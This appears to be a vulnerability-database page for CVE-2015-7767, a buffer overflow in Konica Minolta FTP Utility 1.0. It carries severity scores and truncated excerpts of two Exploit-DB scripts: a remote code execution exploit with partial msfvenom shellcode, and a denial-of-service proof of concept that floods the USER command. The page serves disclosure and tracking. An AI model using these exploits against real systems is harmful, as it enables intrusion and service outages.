CVE-2015-7767
published 2015-10-09CVE-2015-7767: Buffer overflow in Konica Minolta FTP Utility 1.0 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.73%
90.7th percentile
Buffer overflow in Konica Minolta FTP Utility 1.0 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long USER command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| konicaminolta | ftp_utility | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.0 - Remote Command Execution
exploitdb·2015-09-20
CVE-2015-7767 Konica Minolta FTP Utility 1.0 - Remote Command Execution
Konica Minolta FTP Utility 1.0 - Remote Command Execution
---
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x
Exploit-DB
Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)
exploitdb·2015-08-21
CVE-2015-7767 Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)
Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)
---
#!/usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English
import socket
# The ip address of the remote host
ftphost = '192.168.1.7'
# The port of the remote host
ftpport = 21
# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
crafted_user_name= "B" * 450012 # DoS
# Establishing connection
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
2015-10-09
Published